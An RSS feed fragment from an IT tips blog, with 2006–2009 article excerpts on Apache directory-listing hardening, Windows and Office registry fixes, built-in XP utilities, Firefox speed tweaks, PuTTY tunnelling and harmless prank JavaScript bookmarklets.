		<description><![CDATA[默认情况下，Apache是打开目录浏览功能的，其配置文件/etc/httpd/conf/httpd.conf中有如下参数： Options Indexes FollowSymLinks &#8230;&#8230; 也就是说，在目录下没有默认首页面（如：index.html index.php等）时，可以让用户直接浏览web目录架构，这可能会导致一些重要的目录或配置文件被公开。 通常在Web应用上也会做一些安全考虑，一些目录下会有类似的文件： # cat inc/index.php &#60;?php die (&#8216;Access Denied&#8217;); ?&#62; 这样，可以避免用户直接浏览该目录时，看到整个目录结构。但如果访问它下面的子目录就没什么作用了，所以，这还是不太安全。 安全起见，我建议还是把Indexes选项关闭比较好，方法有两种： 1、全局关闭 修改上面提到的配置文件/etc/httpd/conf/httpd.conf： 把 Options Indexes FollowSymLinks 改为 Options -Indexes FollowSymLinks 重启httpd服务即可，这样可以把所有网站的Indexes选项都取消。 2、修改.htaccess文件 如需要针对特定的网站取消该功能，可以先打开.htaccess支持，修改/etc/httpd/conf/httpd.conf： &#8230;&#8230; AllowOverride None &#8230;&#8230; 修改为： &#8230;&#8230; AllowOverride All &#8230;&#8230; 然后，在各网站的主目录下写入一个.htaccess文件，内容有： # head .htaccess Options -Indexes RewriteEngine on RewriteBase / &#8230;&#8230; 保存后马上生效。这时，访问同样的路径，就会报错误提示。 ※ 从服务层面去屏蔽类似的问题，会比从应用层面解决要更安全和可靠。很多应用程序的默认设置都是比较宽松的，所以，在对外公布网站的时候，务必做好类似的安全检查，防止漏洞和隐患。 Like [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/04/522/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Disable Thumbnail Preview in Windows</title>
		<link>http://www.i4wei.com/2009/03/493/</link>
		<comments>http://www.i4wei.com/2009/03/493/#comments</comments>
		<pubDate>Thu, 05 Mar 2009 17:08:42 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=493</guid>
		<description><![CDATA[This article describes a step by step process for disabling Thumbnail previews for faster computer browsing. Follow the steps below to disable thumbnail previews for a faster computer experience. The below mentioned process makes use of a simple hack which effectively makes use of regsvr32. regsvr32 is a command-line utility in Microsoft Windows operating systems [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/03/493/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Solve Problem for Opening .chm File</title>
		<link>http://www.i4wei.com/2009/03/487/</link>
		<comments>http://www.i4wei.com/2009/03/487/#comments</comments>
		<pubDate>Tue, 03 Mar 2009 20:32:25 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=487</guid>
		<description><![CDATA[This problem is a result of a security update Microsoft made which restricts opening certain files on the local network which could run malicious code. Here is a link to a description of the problem: http://support.microsoft.com/kb/896358 INSECURE SOLUTION: The solution is to modify your registry to relax the security for accessing files on your network. [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/03/487/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Shutdown or Restart Windows from Command</title>
		<link>http://www.i4wei.com/2009/03/476/</link>
		<comments>http://www.i4wei.com/2009/03/476/#comments</comments>
		<pubDate>Mon, 02 Mar 2009 19:39:02 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=476</guid>
		<description><![CDATA[In order to shutdown or restart the Windows with just one click shortcut or from command prompt or command line, users can use shutdown command line utility/command that comes with Windows 2000 (with the Resource Kit installed) and Windows XP or Windows Vista (native). To access shutdown command, simply go to DOS command prompt by [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/03/476/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8220;BCM Office Addin&#8221; Error in MS Office 2007</title>
		<link>http://www.i4wei.com/2009/01/454/</link>
		<comments>http://www.i4wei.com/2009/01/454/#comments</comments>
		<pubDate>Sun, 18 Jan 2009 19:02:33 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=454</guid>
		<description><![CDATA[Error message shows when starting a 2007 Office program on a computer running Outlook 2007 with Business Contact Manager: &#8220;Office application version does not match&#8221; Cause: This problem occurs when the Outlook 2007 version number is changed. The Outlook 2007 version number may change for one of the following reasons: You install a hotfix for [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/01/454/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Solution for Microsoft Excel Crash under Vista</title>
		<link>http://www.i4wei.com/2009/01/451/</link>
		<comments>http://www.i4wei.com/2009/01/451/#comments</comments>
		<pubDate>Sun, 18 Jan 2009 18:53:22 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=451</guid>
		<description><![CDATA[Every time open a file, Microsoft Excel 2007 continuously crashes on Vista. Reason: The bluetooth causes this problem. Solution: Disabling send to bluetooth addin function in excel Open regedit Modify the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Excel\Addins And change the LoadBehavior key from 3 to 0 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/01/451/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IBM System x3650服务器上安装内置磁带机</title>
		<link>http://www.i4wei.com/2008/12/423/</link>
		<comments>http://www.i4wei.com/2008/12/423/#comments</comments>
		<pubDate>Mon, 08 Dec 2008 16:09:14 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=423</guid>
		<description><![CDATA[公司新买一台IBM x3650服务器，6块3.5寸的SATA硬盘，需要安装磁带机用作备份。 选件磁带机要安装在左下方两个硬盘的槽位上，如果在那两个槽位上有硬盘，那么将硬盘移到其它槽位上。磁带机的连接线随磁带机选件一起提供。 要在安装3.5英寸硬盘的服务器上安装内置磁带机，完成下列步骤： 图1 1、打开服务器上盖板； 2、移走fan-bracket组件； 3、从保护包裹中取出磁带机和连接线缆； 4、如果还没有将空间填充物从磁带机选件连接到磁带机托架上，那么现在就做； 5、从服务器的内部，将连接磁带机后部的数据连接线从左下的硬盘槽位中穿出到服务器的前面来(见图1)； 6、将所有的连接线连接到磁带机的后部； 7、将磁带机整体组件插入左下的硬盘槽位，然后轻柔的拉数据连结线直到磁带机组件停止移动； 8、然后将托盘的把手推至关(locked)的位置； 9、将线缆的连接头连接到下列主板的接口上(见图2)： ·信号连接头：SATA tape drive signal connector, J102号接头 ·电源连接头：Tape drive power connector, J100号接头 图2 下图指示了SATA tape drive signal cable连接线的走线示意(见图3)： 重要注意：确认线缆要避开所有的风扇接头。 图3 10、安装好fan-bracket组件； 11、安装好服务器上盖板； 12、将服务器重新推入机柜； 13、重新连接好外部线缆，然后重新连接电源线并启动外围设备和服务器。 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2008/12/423/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Download Windows Vista Fonts for XP and Mac</title>
		<link>http://www.i4wei.com/2008/12/421/</link>
		<comments>http://www.i4wei.com/2008/12/421/#comments</comments>
		<pubDate>Mon, 01 Dec 2008 19:07:03 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=421</guid>
		<description><![CDATA[Windows Vista includes several new fonts based on ClearType that can be used on Windows XP as well as Macs. These beautiful typefaces were created especially for improving the on-screen reading experience in Vista. Unfortunately, Microsoft doesn&#8217;t provide a direct way to download these fonts without buying Windows Vista. But here&#8217;s a simple trick to [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2008/12/421/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>隐藏在WinXP中的工具</title>
		<link>http://www.i4wei.com/2008/11/419/</link>
		<comments>http://www.i4wei.com/2008/11/419/#comments</comments>
		<pubDate>Mon, 24 Nov 2008 14:55:13 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=419</guid>
		<description><![CDATA[剪贴板查看器——Clipbrd（system32文件夹下） Windows剪贴板为我们在各个Windows程序间的信息交流提供了一个桥梁。但这部分数据一般情况下无法看到。不过，使用剪贴板查看器就可看到当前剪贴板中的“新大陆”。Windows XP中的剪贴板查看器程序较原先Windows 9X/Me的旧版本多出了共享功能，通过设置权限允许其他网上用户将该剪贴板装入使用。 Windows XP的诊断医生——Drwtsn32（system32文件夹下） Drwtsn32是一个程序错误调试器。 DrWatson程序会获得并记录运行Windows的计算机上的程序错误的信息。只要检测到错误，就会创建一个文本文件 (Drwtsn32.log)，提供错误原因的详细说明，并给出解决问题的建议性xx作，在与Microsoft技术支持联系并请求帮助时，Drwatson将会起到很大作用。 自解压文件制作工具——Iexpress（system32文件夹下） 用过压缩软件的读者一定对自解压文件不陌生，自解压文件可在没有相应解压缩程序的情况下直接将压缩包文件解压缩到相应的文件夹下，极大地方便了用户。利用Iexpress可制作两种自解压文件，一种是标准自解压文件（Standard Self-Extractor），另一种是安装程序式自解压文件（Self-Extractor for Software Installation），这样我们在发布程序时就方便多了。另外大家要注意，尽管使用Iexpress的运行界面是英文的，但利用它生成的自解压文件却是中文的，省去了繁琐的本地化工作。 ActiveX注册和反注册工具——Regsvr32 使用过ActiveX的人都知道，ActiveX不注册是不能够被系统识别和使用的，一般安装程序都会自动地把它所使用的ActiveX控件注册，但如果你拿到的一个控件需要手动注册怎么办呢？如果修改注册表那就太麻烦了，在 Windows的System文件夹下有一个regsvr32.exe的程序，它就是Windows自带的ActiveX注册和反注册工具。它的用法为： “regsvr32 [/u] [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为ActiveX控件文件名，建议在安装前拷贝到System文件夹下。 参数有如下意义： /u——反注册控件 /s——不管注册成功与否，均不显示提示框 /c——控制台输出 /i——跳过控件的选项进行安装（与注册不同） /n——不注册控件，此选项必须与/i选项一起使用 如笔者要注册一amovie.ocx控件，则打入regsvr32 amovie.ocx即可，要反注册它时只需使用regsvr32 /u amovie.ocx就行了。 动态链接库函数启动器——Rundll32 在Windows中使用了许多动态链接库，这样就使得所有Windows程序都可共享这些动态链接库中的函数。一般情况下，许多应用程序都通过Windows API来xx作这些函数，但归根结底是通过Windows文件夹下的rundll32.exe程序来启动相应的函数。它的用法是：“rundll32.exe 动态链接库名,函数名,参数名”。如笔者需要实现一键关机，则在桌面上建立一快捷方式，命令行为“rundll32.exe user.exe,ExitWindows”，并设置其快捷键为F4即可。再如，笔者要打开控制面板，则只需要输入命令“rundll32.exe shell32.dll,Control_RunDLL”即可，要打开桌面属性，只需要使用“rundll32.exe shell32.dll,Control_RunDLL desk.cpl”，其余的以此类推。 对象包装程序——Packager（system32文件夹下） 通过对象包装程序我们可以打开一个文件，并引入其中的图标，将它们插入到一般Windows程序中使用，可用于制作计算机类教学课件或文档。 屏幕键盘——Osk（system32文件夹下） 屏幕键盘是一种实用工具，它在屏幕上显示虚拟键盘，允许那些有移动障碍的用户用指针设备或游戏杆输入数据。屏幕键盘旨在为存在移动障碍的用户提供最低级别的功能。这对于不知道如何键入的用户也很有用。它还可以用于最基本的CAI键盘教学。 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2008/11/419/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sonicwall Viewpoint 4 Installation Troubleshooting</title>
		<link>http://www.i4wei.com/2008/11/412/</link>
		<comments>http://www.i4wei.com/2008/11/412/#comments</comments>
		<pubDate>Sun, 02 Nov 2008 00:53:49 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=412</guid>
		<description><![CDATA[公司里的 Sonicwall 防火墙需要装个 viewpoint 软件来检测整个网络使用情况。准备了一台Windows 2003 Standard Edition R2的HP服务器，因为该服务器准备用做公司SAP服务器，所以已经安装了Microsoft SQL Server 2005. 开始以为viewpoint软件需要使用到SQL SERVER，安装的时候发现它自己带一个SQL Instance。但是不管怎么安装，到phase2都显示无法连接数据库，把数据库连接地址改成SERVERNAME\INSTANTNAME，终于可以连接数据库，安装完后查看LOG文件，显示连接错误，数据库根本没有建成，再试着viewpoint安装目录下SQL\SQLServer\bldMSDB.bat文件，设置USER和PASSWORD，把其他语句改成 osql -e -U %USER% -P %PASSWORD% -S SERVERNAME\INSTANTNAME -i xxx.sql (其中SERVERNAME和INSTANTNAME是服务器名称和instance名称，xxx是sql的文件名称)，运行bldMSDB.bat文件，成功把数据库建完。（注：安装完后可以重新启动服务器来使用viewpoint，也可以到service里面运行SNWL开头的服务）全部结束后，点击桌面的viewpoint图标，进入页面，但是始终没出现登录页面，一直是白屏。查看tomcat服务都正常。来来回回安装数次，都没成功。最后想到是不是因为Sonicwall自带的SQL数据库和SQL SERVER 2005冲突，导致viewpoint安装失败。接着把viewpoint和SQL Server 2005全部卸载，先安装viewpoint，没有任何报错一路顺利的安装完成，也可以使用它的服务。最后再安装SQL Server 2005. OVER 结论：安装Viewpoint之前机器上不能有SQL Server（即使是安装了但是停止了SQL Server服务也不行），必须先装Viewpoint后装SQL SERVER。 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2008/11/412/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>5个有趣的浏览器地址栏Javascript代码</title>
		<link>http://www.i4wei.com/2008/09/365/</link>
		<comments>http://www.i4wei.com/2008/09/365/#comments</comments>
		<pubDate>Sun, 28 Sep 2008 01:37:26 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Javascript]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=365</guid>
		<description><![CDATA[这是一篇关于Javascript的文章，分享几个在地址栏实现的Javascript有趣效果和应用。能在浏览器地址栏实现的效果太多了，字体放大、显示所有图片、显示Cookie等等。但这篇文章重点放在“有趣”上面，当你无聊的时候，不妨玩玩 1、编辑网页 在地址栏输入下面的代码按enter，网页上所有元素都能变成可编辑状态，你可以移动、调整元素大小。如果你只是讨厌某个网站想发泄一下，我建议你使用NetDisater。 代码如下： javascript:document.body.contentEditable='true'; document.designMode='on'; void 0 2、无敌风火轮 在地址栏运行下面的代码可使页面上所有图片元素一个接一个地转圈。这种效果最好的实现地方就是图片搜索了. 改变代码里的“img”成任何网页上有的字符，可以使这些字符做无敌风火轮运动。 代码如下： javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName(&#34;img&#34;); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+&#34;px&#34;; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+&#34;px&#34;}R++}setInterval('A()',5); void(0); 3、晃来晃去 不但是你，浏览器也不是那么喜欢这个javascript。在地址栏运行这个代码后，浏览器会迅速地晃来晃去。代码如下： javascript:function flood(n) {if (self.moveBy) {for (i = 200; i &#38;gt; 0;i--){for (j = n; j &#38;gt; 0; j--) [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2008/09/365/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>五分钟使你的Firefox快两倍</title>
		<link>http://www.i4wei.com/2008/09/363/</link>
		<comments>http://www.i4wei.com/2008/09/363/#comments</comments>
		<pubDate>Wed, 24 Sep 2008 21:30:52 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=363</guid>
		<description><![CDATA[1 、启用流水线技术 浏览器通常都是发送请求到服务器，然后等待，直到服务器回应，而流水线技术则允许用户在服务器响应之前输入多个请求，这样就减少了页面载入时间。 在地址栏中输入“about:config”，进入配置页面，双击“network.http.pipelining”、 “network.http.proxy.pipelining”，将其值均设置为“true”，然后双击 “network.http.pipelining.maxrequests”，输入数值，比如8或是更高。 提醒大家，并不是所有的服务器都支持流水线技术，如果你发现调整后反而影响了速度，那么最好还是将“network.http.pipelining”和“network.http.proxy.pipelining”恢复为默认值。 2、更快地渲染处理 输入“about:config”，按下“Enter”键，然后在窗口任意处点击右键（苹果用户使用“Ctrl”），选择New&#62;Boolean，新建content.notify.interval，赋值500000（注意：不是50000）。 再次右键单击页面，选择New&#62;Boolean，新建content.notify.ontimer，赋值为“true”即可。 3、更快地加载 输入“about:config”，按下“Enter”键，右键单击页面，选择New&#62;Integer。新建content.switch.threshold，赋值250000（四分之一秒），点击确定就可以了。 4、无间断运行 你还可以使你的Firefox完全忽略用户界面，直到当前页面完全加载。 输入“about:config”，按下“Enter”键，在页面任意处点击右键，选择New&#62;Boolean，新建content.interrupt.parsing，设置为“默认”，点击“确定”即可。 5、阻止Flash 当我们浏览很多网页时，经常会有Flash跳出来，这不仅影响我们的阅读而且降低了浏览器的速度，不过这里有一个简单的办法可以解决你的烦恼。 从http://flashblock.mozdev.org下载安装Flashblock，它会帮你阻止弹出的Flash，如果你想要观看其中的一些，那么只需点击其占位符即可下载下来正常观看。 6、增加缓存容量 输入“about:config”，按下“Enter”键，右键单击页面，选择New&#62;Integer。键入browser.cache.memory.capacity，赋值65536，确定后重启Firefox即可获得更大的缓存。 7、启动TraceMonkey TraceMonkey是Mozilla推出的新一代JavaScript引擎，将应用于Firefox3.1中，它大大提高了 JavaScript的编译速度，速度比先前版本提高了近20倍，由于还存在许多Bug，所以在常规的Firefox下载中还不包括 TraceMonkey。 如果你想现在就提高Firefox的速度，而且愿意冒着TraceMonkey会带来的未知风险，那么从ftp://ftp.mozilla.org/pub/firefox/nightly/latest-trunk/下载安装，输入“about:config”，按下“Enter”键，在过滤器中输入“JIT”，然后双击 “javascript.options.jit.chrome”和“javascript.options.jit.content”，将其设置均改为 “ture”，然后你就可以运行这个最快的Firefox Javascript引擎了。 8、压缩数据 如果你的网速很慢，那么怎样让Firefox的速度依然很很快呢，建议你安装toonel.net，这种小巧的Java程序会改变你的网络访问路径，同时压缩数据。这对于降低你的数据传送非常有帮助，如果你的每月流量有限制的话就更有用了，而且它可以使你的浏览器性能提高几乎一倍。 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2008/09/363/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HOWTO: Secure Proxy with Putty</title>
		<link>http://www.i4wei.com/2008/03/43/</link>
		<comments>http://www.i4wei.com/2008/03/43/#comments</comments>
		<pubDate>Wed, 05 Mar 2008 01:43:46 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=43</guid>
		<description><![CDATA[1. Create a new PuTTY session Run PuTTY and create a new session in PuTTY to connect to the remote host that is running OpenSSH. Fill in the hostname, the port (usually 22), make sure SSH is checked, give it a session name and hit Save. 2. Configure a secure tunnel Click on “Tunnels” on [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2008/03/43/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>把outlook最小化到系统托盘</title>
		<link>http://www.i4wei.com/2006/12/9/</link>
		<comments>http://www.i4wei.com/2006/12/9/#comments</comments>
		<pubDate>Sat, 30 Dec 2006 03:03:37 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=9</guid>
		<description><![CDATA[1 打开注册表：开始菜单 -&#62; 运行，输入&#8221;regedit&#8221;并回车； 2 打开HKEY_CURRENT_USER\Software\Microsoft\Office\11.0（如果是Outlook XP，此处为10.0）\Outlook\Preferences项目； 3 建立一个DWord的值（双字节值），名称为“MinToTray”，取值改成 1； 4 关闭注册表编辑器,，如果Outlook XP/2003运行中， 也关掉Outlook XP/2003； 5 启动Outlook XP/2003，此时系统托盘区已经有一个Outlook XP/2003的小图标了，当你把Outlook XP/2003最小化的时候，它就会自己缩到托盘区了。 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2006/12/9/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
